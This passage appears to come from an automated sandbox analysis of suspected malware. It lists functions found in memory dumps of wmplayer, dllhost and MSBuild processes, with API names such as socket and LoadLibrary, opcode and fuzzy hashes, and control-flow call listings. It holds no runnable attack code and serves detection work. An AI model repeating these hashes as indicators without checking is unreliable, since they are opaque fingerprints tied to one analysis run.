                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3764684590.00007DF4ADB71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4ADB71000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_7df4adb71000_wmplayer.jbxd
                                              Similarity
                                              • API ID: FunctionTable
                                              • String ID:
                                              • API String ID: 1252446317-0
                                              • Opcode ID: cff89ce48d21670ef986fb34dbe231ab83686b2b911df37c38ad495f9c0b2048
                                              • Instruction ID: 3db407243258d799f89ab699fb55772d6c44f09646369a8240401143f4cb863a
                                              • Opcode Fuzzy Hash: cff89ce48d21670ef986fb34dbe231ab83686b2b911df37c38ad495f9c0b2048
                                              • Instruction Fuzzy Hash: 30E04F309059054BEB98DA1DC90975036E0EB5C30AF604669D505C92D1DB39989BCF81
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: FreeVirtual
                                              • String ID:
                                              • API String ID: 1263568516-0
                                              • Opcode ID: ef59572018a9deb8cc9717970e2f4ccce5bc515e763955c946e33fff9a11c9f9
                                              • Instruction ID: d433653f9bc1cb13672d0a7dc4ad9076bcc6b9f2dc842ba58536e3c1ae49d853
                                              • Opcode Fuzzy Hash: ef59572018a9deb8cc9717970e2f4ccce5bc515e763955c946e33fff9a11c9f9
                                              • Instruction Fuzzy Hash: FE919270218A0C8FEB55EF58E4D9AEAB7E0FB58300F804559E44BC7196DE34FA45CBA1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: FunctionTable
                                              • String ID:
                                              • API String ID: 1252446317-0
                                              • Opcode ID: a4029a93bfcd341c8676454adb8c6f5f12b6913b14ed0bccef0902b234b6dd47
                                              • Instruction ID: 05c022a76c909d448ba4541a4275f9216841ace8bf11194b445e8de527cc1033
                                              • Opcode Fuzzy Hash: a4029a93bfcd341c8676454adb8c6f5f12b6913b14ed0bccef0902b234b6dd47
                                              • Instruction Fuzzy Hash: 48E04F301009095BEBA8DB5DC94D39036D0EB9830AFA04258D405C9295CB39D49BCF81
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000003.1679091354.00007DF4ADB71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4ADB71000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_3_7df4adb71000_wmplayer.jbxd
                                              Similarity
                                              • API ID: FunctionTable
                                              • String ID:
                                              • API String ID: 1252446317-0
                                              • Opcode ID: fc492990cf9c193ed0fed28dab1318ef1c2e9243cee28bd6a774944ac56baf31
                                              • Instruction ID: 0c7e47f54d23da2ad08f2bf799b9d59d12fb83bd886fe80bf60e70f0af262ca6
                                              • Opcode Fuzzy Hash: fc492990cf9c193ed0fed28dab1318ef1c2e9243cee28bd6a774944ac56baf31
                                              • Instruction Fuzzy Hash: ADE04F709059055BEB98DA1DC9097503AE0EB5830AF604669D505C92E1DB79949BCF81
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3765088712.00007DF4ADB81000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4ADB81000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_7df4adb81000_wmplayer.jbxd
                                              Similarity
                                              • API ID: FunctionTable
                                              • String ID:
                                              • API String ID: 1252446317-0
                                              • Opcode ID: 62df2a061ef9a83e40c3da8f8fbf33d98cfabe8aaf6c816d3fbd47a45bbcd3fe
                                              • Instruction ID: ad9e075eb79f465961588cbcb93f6a08655251f9ffc3a77d86b085b303e33c35
                                              • Opcode Fuzzy Hash: 62df2a061ef9a83e40c3da8f8fbf33d98cfabe8aaf6c816d3fbd47a45bbcd3fe
                                              • Instruction Fuzzy Hash: 36E04F746429054BEBA8E61DC94975036F0EB5830AFA0426DD505CA291CB39949BCF82
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                              • Instruction ID: 1b9924acae3c4f7b723a48d61ad4fde45677fdbbec3ffd00baeefdea04c60b44
                                              • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                              • Instruction Fuzzy Hash: 17D0A710320D0E1BEA58637D6CE937591D5E7CC221F90023AB40BC2282DD5DCD550390
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3764684590.00007DF4ADB71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4ADB71000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_7df4adb71000_wmplayer.jbxd
                                              Similarity
                                              • API ID: InformationProcessQuery
                                              • String ID: ($.$o
                                              • API String ID: 1778838933-116743476
                                              • Opcode ID: 4bc1349027c11bed1782b00e19f7c38053766996ee3beef85e27a3dd3919dec8
                                              • Instruction ID: caba274068d3b2540c7a88f8e4125ec760cec0de08cec03189228e2655db760c
                                              • Opcode Fuzzy Hash: 4bc1349027c11bed1782b00e19f7c38053766996ee3beef85e27a3dd3919dec8
                                              • Instruction Fuzzy Hash: 2781907090E7D44FE3759B6884183EBBBF0FF55344F14292ED0EBC32A2E62895458722

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.3755090359.00000213BBF50000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BBF50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_213bbf50000_dllhost.jbxd
                                              Similarity
                                              • API ID: Information$QuerySystemVolume
                                              • String ID:
                                              • API String ID: 2187445334-0
                                              • Opcode ID: bf88aa79f3393f2c4270e4c8f0c1006911046903424164ea2339802639798b84
                                              • Instruction ID: b50539c369f62ff0aaefac13a904be529252b40acabe56372d60136144a3263d
                                              • Opcode Fuzzy Hash: bf88aa79f3393f2c4270e4c8f0c1006911046903424164ea2339802639798b84
                                              • Instruction Fuzzy Hash: 8B91A531118F094FE765EB38C8497E673E2FB64305F104A3AA45BC32A5EF35D6458B81

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 345 213bbf52ac4-213bbf52bb5 call 213bbf53b44 call 213bbf51030 call 213bbf51914 call 213bbf51488 call 213bbf516a0 call 213bbf51488 call 213bbf511dc call 213bbf51488 call 213bbf511dc call 213bbf51488 call 213bbf511dc 369 213bbf52dba-213bbf52dd5 call 213bbf51488 call 213bbf517dc 345->369 370 213bbf52bbb-213bbf52bc3 call 213bbf82736 345->370 378 213bbf52dda-213bbf52df6 369->378 374 213bbf52bc8-213bbf52bcd 370->374 376 213bbf52bd4-213bbf52bf0 374->376 377 213bbf52bcf-213bbf52bd2 374->377 379 213bbf52c01-213bbf52c03 376->379 390 213bbf52bf2-213bbf52bff call 213bbf82736 376->390 377->376 377->379 387 213bbf52df8-213bbf52e38 call 213bbf54a20 call 213bbf55dc6 378->387 388 213bbf52e3b-213bbf52e50 call 213bbf53cb0 378->388 381 213bbf52c19-213bbf52c1c 379->381 382 213bbf52c05-213bbf52c08 379->382 381->369 385 213bbf52c22-213bbf52c25 381->385 382->369 384 213bbf52c0e-213bbf52c17 382->384 384->381 389 213bbf52c27-213bbf52c2e 385->389 387->388 394 213bbf52c30 389->394 395 213bbf52c32-213bbf52c38 389->395 390->379 394->395 395->389 396 213bbf52c3a-213bbf52c5b call 213bbf51488 call 213bbf517dc 395->396 407 213bbf52c5d-213bbf52c64 396->407 408 213bbf52c6a-213bbf52d9e call 213bbf51914 call 213bbf51488 call 213bbf55dcc call 213bbf51488 * 2 call 213bbf55dcc call 213bbf51488 * 2 call 213bbf55dcc call 213bbf51488 * 2 call 213bbf55dcc call 213bbf51488 * 2 call 213bbf516a0 call 213bbf51488 call 213bbf55dcc call 213bbf51488 407->408 409 213bbf52da3-213bbf52da9 407->409 408->409 409->407 411 213bbf52daf-213bbf52db8 409->411 411->378
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.3755090359.00000213BBF50000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BBF50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_213bbf50000_dllhost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6d2732d31d058e475aa1d3db2d810b78d2ce7aeb846d2da72cd2dfad050138dd
                                              • Instruction ID: ad3533914b0d3d64c93b690336ce2974c68aaa1eb18a8fd31f50cfec06f65628
                                              • Opcode Fuzzy Hash: 6d2732d31d058e475aa1d3db2d810b78d2ce7aeb846d2da72cd2dfad050138dd
                                              • Instruction Fuzzy Hash: 9CB1073121CE095BE756EB14C4A5BDB73E2FBA5308F404619A487C719AEE35F709CB81

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.3755090359.00000213BBF50000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BBF50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_213bbf50000_dllhost.jbxd
                                              Similarity
                                              • API ID: socket$ErrorModeStartupgetsockopt
                                              • String ID:
                                              • API String ID: 2955919026-0
                                              • Opcode ID: 690d345f2021f6da5236feb68d8b287bbf9abb83f2ecb601865a28f0a565e020
                                              • Instruction ID: deac54a069d3e5e7982cc5acf9464a7b2c1c17345814d9b95e4f708f1261f330
                                              • Opcode Fuzzy Hash: 690d345f2021f6da5236feb68d8b287bbf9abb83f2ecb601865a28f0a565e020
                                              • Instruction Fuzzy Hash: F1412470518A488FE754EF28D89C6D977E2FBA8304F51976EE046C32E5EF399508CB41

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.3755090359.00000213BBF50000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BBF50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_213bbf50000_dllhost.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID:
                                              • API String ID: 613200358-0
                                              • Opcode ID: 842a0fcfbae77ddf7c9ef53a2fdb97499bdab63288fbf5ca7410195d085d151d
                                              • Instruction ID: 7574d692c283ab4ffe16688b4d27f67f07cb5890d572492e55cf40719ac13b8e
                                              • Opcode Fuzzy Hash: 842a0fcfbae77ddf7c9ef53a2fdb97499bdab63288fbf5ca7410195d085d151d
                                              • Instruction Fuzzy Hash: 4D31A5342159098FEFA8FF19D8AD7E83393FFA4305F5440A8980ACB19ADE25DE55C750

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.3755090359.00000213BBF50000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BBF50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_213bbf50000_dllhost.jbxd
                                              Similarity
                                              • API ID: File$CreateMappingView
                                              • String ID:
                                              • API String ID: 3452162329-0
                                              • Opcode ID: 07ba9efbedda36450ba34410379ba26bd737a34b556add273976d4b653339635
                                              • Instruction ID: d7db527c52201658a7382e79f3940afae2689652d9f436b283830bdf7534b70b
                                              • Opcode Fuzzy Hash: 07ba9efbedda36450ba34410379ba26bd737a34b556add273976d4b653339635
                                              • Instruction Fuzzy Hash: A451913151CB888BD725EB28C8857EAB7E1FB94305F00492FA4DBC2191EF349609CB92

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.3755090359.00000213BBF50000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BBF50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_213bbf50000_dllhost.jbxd
                                              Similarity
                                              • API ID: Completion$CreateFileModesNotificationPort
                                              • String ID:
                                              • API String ID: 3755109111-0
                                              • Opcode ID: 3d04898f0baabecc2f3c6bacaaade18d79c33302fe0cdaf5b807a00c8715d7ea
                                              • Instruction ID: 4ed4b1ac7c07141f83acf50383598f21ff43c9bdc339c724c753efb0acc9c606
                                              • Opcode Fuzzy Hash: 3d04898f0baabecc2f3c6bacaaade18d79c33302fe0cdaf5b807a00c8715d7ea
                                              • Instruction Fuzzy Hash: B131A4303285154BFF78DB29988D7E572D6F764319F5001A9E806C21EAEF26CF458781

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.3755090359.00000213BBF50000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BBF50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_213bbf50000_dllhost.jbxd
                                              Similarity
                                              • API ID: InformationVolume
                                              • String ID:
                                              • API String ID: 2039140958-0
                                              • Opcode ID: fc96228221a64c14c7771b2c820f555db7d261a1131db5f0bd3cfba39c9abf21
                                              • Instruction ID: 7e18df8629d53117494d011bfb0fbc37fb2102d87102fc3a67aee0984ad33032
                                              • Opcode Fuzzy Hash: fc96228221a64c14c7771b2c820f555db7d261a1131db5f0bd3cfba39c9abf21
                                              • Instruction Fuzzy Hash: AB51F47111C7488BE76AEB28C4987DBB7E1FBA4304F504A2DE08AC2195EF759709CB42

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.3755090359.00000213BBF50000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BBF50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_213bbf50000_dllhost.jbxd
                                              Similarity
                                              • API ID: socket
                                              • String ID:
                                              • API String ID: 98920635-0
                                              • Opcode ID: e6fd14d16137a95e4702a1e33f0533e96a3ee2d73c8ca89cef5c35a36976fbc4
                                              • Instruction ID: f53397d7b06740eb74e118eaf093bfa50b55d2cf480db1e636aceb569ad9c53d
                                              • Opcode Fuzzy Hash: e6fd14d16137a95e4702a1e33f0533e96a3ee2d73c8ca89cef5c35a36976fbc4
                                              • Instruction Fuzzy Hash: BB21B7303185044FEF68DB39988D7E533D2EB64329F2046A9E82AC72D9EF358E554752

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.3755090359.00000213BBF50000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BBF50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_213bbf50000_dllhost.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID:
                                              • API String ID: 613200358-0
                                              • Opcode ID: 8ba5e81e031e817494e782a31e249e73ef5175517b47c90734a6ec4d735d2d12
                                              • Instruction ID: a70495800af909219e219dae02fd1fd3135dc95948845111e1c75718fefbeb1e
                                              • Opcode Fuzzy Hash: 8ba5e81e031e817494e782a31e249e73ef5175517b47c90734a6ec4d735d2d12
                                              • Instruction Fuzzy Hash: B11173315248085BEBB8FB65C4997E93392FBA4314F5412759C1FC618FEE260B4AC690

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.3755090359.00000213BBF50000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BBF50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_213bbf50000_dllhost.jbxd
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: 147b7861b8d55a5ae4162ffc4259640c3a28b81395385b0f304c643425426fcc
                                              • Instruction ID: b7079bf3f7e2f002c77fe6fdc2803c17d40f426cfd4e3c7bba0bdfd490a93ae6
                                              • Opcode Fuzzy Hash: 147b7861b8d55a5ae4162ffc4259640c3a28b81395385b0f304c643425426fcc
                                              • Instruction Fuzzy Hash: AD014430318E090AEA69F374485D3FD22D7FBA5319F440329680AD32DAFE16DB085651

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00000213BBF58038: ??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,?,00000213BBF5454C), ref: 00000213BBF58089
                                                • Part of subcall function 00000213BBF58038: ??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,?,00000213BBF5454C), ref: 00000213BBF580A1
                                                • Part of subcall function 00000213BBF58038: ??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,?,00000213BBF5454C), ref: 00000213BBF580FE
                                                • Part of subcall function 00000213BBF53CB0: ??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000213BBF54590), ref: 00000213BBF53CD9
                                              • ??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000213BBF545DB), ref: 00000213BBF54579
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.3755090359.00000213BBF50000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BBF50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_213bbf50000_dllhost.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID:
                                              • API String ID: 613200358-0
                                              • Opcode ID: cea5a1abd7c6ef95cc881fb3b015a3920f1a58e6b13961532c49689afed8ac0f
                                              • Instruction ID: dcf8eed8cc0f4a5c962e4b184f17a55ce2c54f400d0e45f73b10a5314d7b543d
                                              • Opcode Fuzzy Hash: cea5a1abd7c6ef95cc881fb3b015a3920f1a58e6b13961532c49689afed8ac0f
                                              • Instruction Fuzzy Hash: F20125311149084FD759EB18C8DDBE9B3A2FBA4308F540299941AC61DAEF359B4EC7C0

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.3755090359.00000213BBF50000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BBF50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_213bbf50000_dllhost.jbxd
                                              Similarity
                                              • API ID: AddressCallerProc
                                              • String ID:
                                              • API String ID: 2663294120-0
                                              • Opcode ID: be8164fcd6bb8b439b0c6dd95cb79210c8cf986f476e4ea7066077b0df3d1665
                                              • Instruction ID: 04614604c734029b52ebd7b805212940523dff48154026b69103d3874639e540
                                              • Opcode Fuzzy Hash: be8164fcd6bb8b439b0c6dd95cb79210c8cf986f476e4ea7066077b0df3d1665
                                              • Instruction Fuzzy Hash: 87E0C221718C090BAB78A1AE248C6F651C6C7EC27670402BBE41CC3299ED11CD450390

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 335 213bbf52874-213bbf52891 call 213bbf51994 338 213bbf52898-213bbf5289e 335->338 339 213bbf52893-213bbf52896 LoadLibraryA 335->339 339->338
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.3755090359.00000213BBF50000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BBF50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_213bbf50000_dllhost.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                              • Instruction ID: f35568f047778682c4e09a0758aa0e790cfbd22d610be31b2a97550f5aa62a06
                                              • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                              • Instruction Fuzzy Hash: ADD0A720324D0E1BEA58A37D1CA83F511C6E7EC32AF50113AB409C2285ED59CE590300

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 340 213bbf53cb0-213bbf53cc1 341 213bbf53cc3-213bbf53cc8 340->341 342 213bbf53cdf-213bbf53ce3 340->342 341->342 343 213bbf53cca-213bbf53cd4 341->343 343->342 344 213bbf53cd6-213bbf53cd9 ??3@YAXPEAX@Z 343->344 344->342
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.3755090359.00000213BBF50000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BBF50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_213bbf50000_dllhost.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID:
                                              • API String ID: 613200358-0
                                              • Opcode ID: 8cb90f487aa88aaeb899a82658a4f96ee9d6a5816eee242e74479443c5ca5ecc
                                              • Instruction ID: 9fec42b40b7c86b83da1c9308ec58a25bf002dc2ba1036fa3215df16c6874689
                                              • Opcode Fuzzy Hash: 8cb90f487aa88aaeb899a82658a4f96ee9d6a5816eee242e74479443c5ca5ecc
                                              • Instruction Fuzzy Hash: 6EE0EC30315D198EEB69EB39885C7E032E1FB68308F980958E006C31D4FA6DDA49C752
                                              Memory Dump Source
                                              • Source File: 00000024.00000002.1998522405.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_36_2_a20000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7decbfcc8004d1471a370e148c3d4da70c839c5f0f399ca7ae7eb383a4edf586
                                              • Instruction ID: 0884e9843293912ebfdc5bd7ea34e5bca8afdc1d744c0a3fc249388b39e2f2b8
                                              • Opcode Fuzzy Hash: 7decbfcc8004d1471a370e148c3d4da70c839c5f0f399ca7ae7eb383a4edf586
                                              • Instruction Fuzzy Hash: 30819D34B002158FDB55EF78E959B2E7FE2BF88314F148569E0069F3A6DE749C068B81
                                              Memory Dump Source
                                              • Source File: 00000024.00000002.1998522405.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_36_2_a20000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9907581cb1532d5dc71a3a9cbc7bb6dcb0866cead5c78c23f7295c8f70d4b6d4
                                              • Instruction ID: 7466f544a0a1323b28e333f4c4023d0f7df4ff004b27eea0d864f2651acd1e59
                                              • Opcode Fuzzy Hash: 9907581cb1532d5dc71a3a9cbc7bb6dcb0866cead5c78c23f7295c8f70d4b6d4
                                              • Instruction Fuzzy Hash: 2C519034B012158FDB15BF78E958A2D7BE2BB84305B108629D0169F3A6EF749D06CB81
                                              Memory Dump Source
                                              • Source File: 00000024.00000002.1998522405.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_36_2_a20000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4073920e07d54a2d82f315fbd618b1935acc42a7560c8fc4e4f9d699bc2516ab
                                              • Instruction ID: 60decb1f1fc79fa3c650383f0d180567de0fc958c23b5c7e039db974b89b454d
                                              • Opcode Fuzzy Hash: 4073920e07d54a2d82f315fbd618b1935acc42a7560c8fc4e4f9d699bc2516ab
                                              • Instruction Fuzzy Hash: 623180307003158BD725BB78D415B1EBA92BF84315F14CA2DD0269F396DF75DD498B82
                                              Memory Dump Source
                                              • Source File: 00000024.00000002.1998522405.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_36_2_a20000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 70ba5940ee7eec4b19b1667817b2a009d0f3f39f092042eb5071e46351593ddd
                                              • Instruction ID: 332c6b28981930685cb15b476bbe52911d417a5d62f1c6b58a8e13b676ea95d1
                                              • Opcode Fuzzy Hash: 70ba5940ee7eec4b19b1667817b2a009d0f3f39f092042eb5071e46351593ddd
                                              • Instruction Fuzzy Hash: 8D21C271F043145FDB14ABBD581936EBEEAAFC8300B18852EE44BD7382DD389C0287A1
                                              Memory Dump Source
                                              • Source File: 00000024.00000002.1998522405.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_36_2_a20000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 34e0e5fdb6321a1ebea2e507d72c4ed76f5a4b924bfcd600950e0e965140ec37
                                              • Instruction ID: faed56b4c6c8e438f9e149328909ea6ffa19b95bbaf9e855168a6160fa291b1a
                                              • Opcode Fuzzy Hash: 34e0e5fdb6321a1ebea2e507d72c4ed76f5a4b924bfcd600950e0e965140ec37
                                              • Instruction Fuzzy Hash: 8B31AE74E003089FDB45EFB8D95469D7FB2FF88304F10866AD001AB255DB306A45CB51
                                              Memory Dump Source
                                              • Source File: 00000024.00000002.1998522405.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_36_2_a20000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 613ae78417087d4db77fa9944407720faf49a76831af3d22ae2678d6d14d4113
                                              • Instruction ID: fcb4b10c66365b9704a27319d6de02f95fca7d17e490d59aedcae19424f1e8c5
                                              • Opcode Fuzzy Hash: 613ae78417087d4db77fa9944407720faf49a76831af3d22ae2678d6d14d4113
                                              • Instruction Fuzzy Hash: 81218D74E003089FDB45FFB8D948AAD7BB6FF88304F108569D005AB354EB706A45CB51